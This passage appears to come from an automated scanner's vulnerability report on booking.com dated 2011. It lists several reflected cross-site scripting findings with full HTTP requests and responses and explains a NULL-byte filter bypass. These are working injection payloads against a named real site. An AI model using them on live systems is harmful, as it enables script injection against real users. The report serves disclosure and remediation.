_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:27 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YXwiHh2%2F7WNDWgwOhJxwg7m3%2FTm%2Bpe85r18OTZ9lRoP8elUE0dmw8%2FadgG6c5SxD4aid1EHwSrafOMxcdczliGE6pI96UCUaChZ8AHgVMcuyemt5od5JE3EgU855Gq1vfVUuXnSBJU%2B3lUAtBhYLyXVgw5jaKRTu1dLT6JTmprya8%2FgmQ90g56i8TUsQ5CCS4RLMSvz1juaVV%2BGn6eJhJgLPDmYtmW67ocnRA4fLwc4if14Cy1PjqbA7GVqHWB04kLXc29JJGU1ZQEI8vmupyNkZRCwIZp32Km0KOk58RBEg%2BIxWbX5ENkUNFl%2BLB4AbUfwFbbxM4PnglJGDss8M329FUJL0yQTB7isi8lkB3s%2B2r05rCg3oCB3YtiZSvlu1ctX%2FDNFOWUjh12L8xenNTAVTByMQXBQG5zOPOqZzbnV7vXp5nWvdt0FTOFZwAz1W7Xzf7NOAt%2BRO96N39xqcFlMHYbVgLYEvbVvPjrzhoSJOIDg0B7ymtZ5xJdwoK3VBS1uU3MODPUytRuw6jDZZfTQ88mfOnwrqejWbeBtwVGAmV0EAbD%2FuDcJcQr23c2NPBuogOuwizCVtyiLcWQw0VXSeLOGEtom8EeOmZz7cgxFD%2Fo2trA%2FMemyTyKcuR7mvs7WvXsNWFsN5j5GEyioO1tP%2Fss3dWUJ26uVBxNQTGP5vOpEcJye6DL7OPeqSjO6RWTuTE1REbwfv%2FTt8593Y3BAxpAjsFcv6ZapdlgndN4uL5aqMYRSCCeTpmyibjpZwSX%2B%2FNwseL8sS86LfIKqAdAoHrroHG5O2MHieMWp3uh00eP0D8Bx9hdcaXL3bmZW15HL2rOBKoMWfN3Xmp1JkoxWrOyny%2BuU0wOfOwcYYwgyfNNfnRuM62%2FjgvBwtDCgmpqnQukoZH7tbz2mF9YNnmiPDXLe0C1FDDFtdL6wgnDLFIFGaANugYWFOKtg%2FxnM3O7xyj3YObEDusoAtDsRPKswe4aJ0gYgeJZYGrCh8v%2FPsMfYVNqC9nEPN0NjtjS854Mk9mwDRx2VUWnC4ZviYTSG00u44G6pC%2F4p6stPiA5lZXx%2BYdOjC4r1N%2Fs9Pf1F6f9eFc03H8TCGo4XoxEcmQlUCayCiKUMGmVTDizuwyvTlGop2ZvyWb4L%2B6E3Mqqyru5fXB380%2BFbYJutw5fRVIYGTsYFJfQM1YxWU64DlZRWs5N0TjeB1PawMafnu5qf32rQnJqlAxQGIvuze88oTPKtvXTs4D5eIqRERLUtTMxSVe6tPyh%2BTIanL6Vqph3HUt7LOLeUr4Tm%2BB4LTNboEWO8ljCAxHpF4HXKDhGHu3y0u%2F%2FWZQ7dzaFLhuCLgIgBqyVPS8eWNzk5%2FeY4xWvNKHb%2Fx2neF%2FZXNbcbcStV04yGjsembsy08i%2B9zRDd9UMjG1EHnDhFV7s7QaRz2KOzSv4wqoZabkKKKCmRzlYHQAzeVDc9rxdtYOmfuYZMfMAZjjA%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:14:28 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 392613
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country
...[SNIP]...
nk" title="Forgotten your password?" href="https://secure.booking.com/login.html?op=remind;lang=en;go_back_url=http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1241d5"><script>alert(1)</script>c693cd0ec72&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717">
...[SNIP]...

4.223. http://www.booking.com/searchresults.html [do_availability_check parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The value of the do_availability_check request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3a7e</script><script>alert(1)</script>ea78450c27a was submitted in the do_availability_check parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /searchresults.html?aid=335591&city=20061717&do_availability_check=1c3a7e</script><script>alert(1)</script>ea78450c27a&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:15:53 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YXwiHh2%2F7WNDWgwOhJxwg7m3%2FTm%2Bpe85r18OTZ9lRoP8elUE0dmw8%2FZhpzeT%2BK4hAwg2A7xSkue5aXj8iDpRCv48zvdAT7pKC1dSIOa9Na5R0%2B%2B53Kbb0h3pLB1EiIcvX%2ByxMqQD6KySxQIPeENSCd9h1YEcALcJnnHnBQp5p75xchIQl1aD1BVKINVzxzhzXXNtW18qIMxwgxUol1xC6Keq1woll7upc6M9F15La%2FwgLi3EFLYLLGEIrCQQLMNgVMgmroSkaqgE4vtvmPM6yAMRtIwYq54hPOFLrTcy%2F2wYzZLBUUnnUZmYdj%2FpI6aIeMztpC%2BypNYMbLwrwZTkmz161Nv53iAsOaXTvAV8pzQIIUVAuZGSTQyFlF5olAIJKbtW8PK5QqRVRUJuYNeGYBS%2FZir4zBCkVSoGnVl2C6NwceXbcIQFzEcRY8yt%2F7CAtMfCQEcDHDFVXRT9vYVX077S42zp22a0j%2BSn7aRQ7OLVw72kSGvYxaQp5Dji9cM6ayi8IcXP4hyHIc2B01Q75WiUkRRbnjfzcaKjlByl%2F3N0Hl0KzBEOx1xo8Uz0%2FR%2BZO44gFny8Mw73HKJ0QawML%2F43GMIVRGyDWq%2Bt0QxH6qVYD%2BGmGSpDbLvriMGSieEzpLj%2FDLj3mgMOH1pcDLf9ZurwbA%2BVmVVp3osHlXxcOvlTRRcamlnuPx6vrVQGzkLCSQoyCxYUYGn6rI4x1VK6o2g0DebFMyRy5pEfBzHHqjejh0EVqsd536%2FKCNtO36u%2BU5VwAMQJZl2Rwx3oBjCmXNDXdtdS1VcPK1i7PiojvhONnedB8Zwd2TwF2NYexfQ1X0pZQ%2BmNsxTCWuv3aC5NX5NyDIlRFJMNaqPHniWw7bQANuvEVZdHa%2FPtQZSt2XtxkXh5AQ%2BxAGy%2BJpoxXArsbPFCy0pD7B7t8NLwmdpup%2BfLuWgjUOCkv08HBjD8JFBF8oGGe1YwqnUEzS1U8MfkLiGamdfSrUHcuht5Siovs2%2BnZn%2BAYEP35ovtNvL3F2SPFjrVb9GVm1RVrRzTS%2Fvbn2ddOiB49gKx0U0042Dp6AKvDL4xGa04azDxRjEoxnORykr39JkbAjTJK90en9hqxAc8NN8WJS9cvMh9NVmGpmIUmWAMYWb14ab32hkWvS%2BpT6%2FNVpFARjI5EOxQot7L82gcupJUKM6FgadMkZ%2FNMkSU3fGuObOQ1e%2FMY55tl9afDgi0kDUTi7beZgu8IqeXgduSVVh54OJ4BX4N1st2p8S7O8OWI9o%2FjklR6nRDXqGGm9r1mfX9GAgazy2APL29Q2ttTw1%2BJBuMAAbn2E92jHBNFVGJxwz4drqUd82LShp9sBw0KtkMHOAhncT7I8fnbJut0Go0Hq5ksnjgpw7wS3hj19chBn%2B7iK5ZBXTUUUTvEZxyjkKxoGyuqsy%2BdkdfLaWHkFNF%2BURvjEZfdXo%2BKi9RBXQR4ydP2%2FMdVuEqzzEGiw%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:15:54 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 392796
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country
...[SNIP]...
s',
"b_fb_id" : 'FB_text',
locale_for_facebook : 'en_US',
b_domain_end : '.booking.com',
b_original_url : 'http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1c3a7e</script><script>alert(1)</script>ea78450c27a&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717',
b_this_u
...[SNIP]...

4.224. http://www.booking.com/searchresults.html [label parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The value of the label request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b92f4"><script>alert(1)</script>0924bec2c54 was submitted in the label parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717b92f4"><script>alert(1)</script>0924bec2c54&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:21:45 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YdN864bAdMj5susnz%2B%2FDu3gSLqTPdzNwjL1I31V18mXsyk%2B69o4hArL0OKvHY7Kvxwj%2FcgZmigWcuouhIz31s%2BHiNSsUcs7i90XA7al3KkuFl9h4U9OioXxDOBtJrYNqCbnyiliwrLNa9vcnwhCabGW0Gsi3X67dPlj%2B%2FUZrOixMUkWAdHdCpQO6KDlC%2BVaM074nNTbZUb%2FbRk%2FN10Lux1Y6x4JTqsk1sEgrgJKp3noVRuitHm9fAgIzgvQHoU5MXehonNAvfLYXApJ4fPWrCxMHOvRNXal8RUXCNwvBVbKDjZ4jcqpLua%2Bw7%2BqOHipoWsFLWyaVCHvjhthI06JhgXn%2BtsyCXvPhMdvEppUgdWRkDNFVgBQuafsgwBufDsAxjE3ql%2FxbvdimX%2FOR3ivcMQkorAcwjCsCKODYX4MyhLvhMo4LkDrfNx2sQm%2BQhxxwDTSAke6I7GZ7Wn%2F0MkD7OAIFfkkO0UAbWI3wr8%2BAhf8iNJxAD%2Fr2Bmxp9JGc4Kqg7eoXGR7qX2eb6jpi2LMxyncmGoi5V9XAilh6q18rjMcJJr%2FfCAQidB1KV%2F6SOy5x%2BoK%2FwGU9rgs86WSPHrhDptRoguskisPbYmKDPG%2BlK7y%2BPhUPGSc%2BZaMaTcbhmpMJiNOPmvQaGIvdYtl8L22StdH47ZOdJvJeGo%2F%2BflrNpRDiMJkPUSRVy5nTNPSBPl6V5ASZjlgxISPWFfllZg2udihj%2BM2OJ2EviHGjSx0v%2BMo%2FNtSHeUPFBunnW9hwi9gLD7O2Foe%2BSZ8X6ncgcLIqb4KkPdcriZWz46nJATp5qYlpkSICmk0A49qkTej5wZpi3SCNLdWiubULvChUlcArz%2B4LfeKZZUI3oKIpxlL04OKL%2B5Bg5GvY3JBiXQrTJ5hTsBjkPBlDew1XiUz%2F7dv8D9ucGGx7HSsPe%2BRrKLFqHEavmdSxfLwKp9mrc5IRa1Y%2Fs%2FdVVeBaNvV%2BGm3epUiqPYFVf69rf5lLT7DkbzjdGEDgz%2BIJKkxIrXgCfszLKVKqHeDu1yuYaLyVnKvfDp5KzNo%2BKFLqhKbvGJWjXYlK3QOjE%2FDU%2BpgEArXuU9kl4zWV9rKBbuVj63EiNAGTnnth9njbOGfVHtXtgRiup44QIeUyBKn6n8aXfETR17zkr3ETm1l3mk965DYp5TGYsh2nn02AeSAdeFd1rECbZyd7FADx%2FKHeU41lQIB28kLuPoxQU4x%2BMklM0aUS6iRdAuJ17r%2Banbw4fiU3%2B9v6QFN0Mg%2BKy1lfEFcXpEy7mDrfDDgzindKlyaWVt2UQdycXb%2BtBE%2FajEHI2%2BV6Ytm8X1cf9fR2PRHsIu8PuUY36BGdDoKEwXrdooxW0oaJMXqdiYsnVL%2BXD0EwsoxyaffsBhAcdRU%2F29z5F8G1UoPHhJ3ryqsktM8c9os43XZcqjkRshGvu3qkgD4I6vL1nrGVlxp3Q%2FwSRLKZzDOMveFBQ7EMRNNrsA%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:21:46 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 424018
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country
...[SNIP]...
//www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717b92f4"><script>alert(1)</script>0924bec2c54&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717">
...[SNIP]...

4.225. http://www.booking.com/searchresults.html [label parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The value of the label request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e13b6</script><script>alert(1)</script>4f08add9a9c was submitted in the label parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717e13b6</script><script>alert(1)</script>4f08add9a9c&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:23:02 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YdN864bAdMj5susnz%2B%2FDu3gSLqTPdzNwjL1I31V18mXsyk%2B69o4hArL0OKvHY7Kvxwj%2FcgZmigWcuouhIz31s%2BHiNSsUcs7i90XA7al3KkuFl9h4U9OioXxDOBtJrYNqCbnyiliwrLNa9vcnwhCabGW0Gsi3X67dPlj%2B%2FUZrOixMUkWAdHdCpQO6KDlC%2BVaM074nNTbZUb%2FbRk%2FN10Lux1Y6x4JTqsk1sEgrgJKp3noVRuitHm9fAgIzgvQHoU5MXehonNAvfLYXApJ4fPWrCxMHOvRNXal8RUXCNwvBVbKDjZ4jcqpLua%2Bw7%2BqOHipoWsFLWyaVCHvjhthI06JhgXn%2BtsyCXvPhMdvEppUgdWRkDNFVgBQuafsgwBufDsAxjE3ql%2FxbvdimX%2FOR3ivcMQkorAcwjCsCKODYX4MyhLvhMo4LkDrfNx2sQm%2BQhxxwDTSAke6I7GZ7Wn%2F0MkD7OAIFfkkO0UAbWI3wr8%2BAhf8iNJxAD%2Fr2Bmxp9JGc4Kqg7eoXGR7qX2eb6jpi2LMxyncmGoi5V9XAilh6q18rjMcJJr%2FfCAQidB1KV%2F6SOy5x%2BoK%2FwGU9rgs86WSPHrhDptRoguskisPbYmKDPG%2BlK7y%2BPhUPGSc%2BZaMaTcbhmpMJiNOPmvQaGIvdYtl8L22StdH47ZOdJvJeGo%2F%2BflrNpRDiMJkPUSRVy5nTNPSBPl6V5ASZjlgxISPWFfllZg2udihj%2BM2OJ2EviHGjSx0v%2BMo%2FNtSHeUPFBunnW9hwi9gLD7O2Foe%2BSZ8X6ncgcLIqb4KkPdcriZWz46nJATp5qYlpkSICmk0A49qkTej5wZpi3SCNLdWiubULvChUlcArz%2B4LfeKZZUI3oKIpxlL04OKL%2B5Bg5GvY3JBiXQrTJ5hTsBjkPBlDew1XiUz%2F7dv8D9ucGGx7HSsPe%2BRrKLFqHEavmdSxfLwKp9mrc5IRa1Y%2Fs%2FdVVeBaNvV%2BGm3epUiqPYFVf69rf5lLT7DkbzjdGEDgz%2BIJKkxIrXgCfszLKVKqHeDu1yuYaLyVnKvfDp5KzNo%2BKFLqhKbvGJWjXYlK3QOjE%2FDU%2BpgEArXuU9kl4zWV9rKBbuVj63EiNAGTnnth9njbOGfVHtXtgRiup44QIeUyBKn6n8aXfETR17zkr3ETm1l3mk965DYp5TGYsh2nn02AeSAdeFd1rECbZyd7FADx%2FKHeU41lQIB28kLuPoxQU4x%2BMklM0aUS6iRdAuJ17r%2Banbw4fiU3%2B9v6QFN0Mg%2BKy1lfEFcXpEy7mDrfDDgzindKlyaWVt2UQdycXb%2BtBE%2FajEHI2%2BV6YpzrsI5SzS%2BQb%2Bb3G46mcFw7uv282jydUonn8V%2Be2DNNbuunjVd4QEKlf6kiOQwEhvC4Kem4egVt2gQx912jRKIqrlDWzWUpphx9ROSfi4stAQoqAHQe50OCUcSj5XYvqn7Dk8dHRqN8IOxuK%2FDfaCvdYEWClA4Feg%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:23:03 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 428678
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country
...[SNIP]...
//www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717e13b6</script><script>alert(1)</script>4f08add9a9c&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717',
b_this_url : '/searchresults.en-us.html?aid=335591;label=ufi-P20061717e13b6%3C%2Fscript%3E%3Cscript%3Ealert%281%29%3C%2Fscri
...[SNIP]...

4.226. http://www.booking.com/searchresults.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29030'%3balert(1)//3ae62dd2bf5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 29030';alert(1)//3ae62dd2bf5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717&29030'%3balert(1)//3ae62dd2bf5=1 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6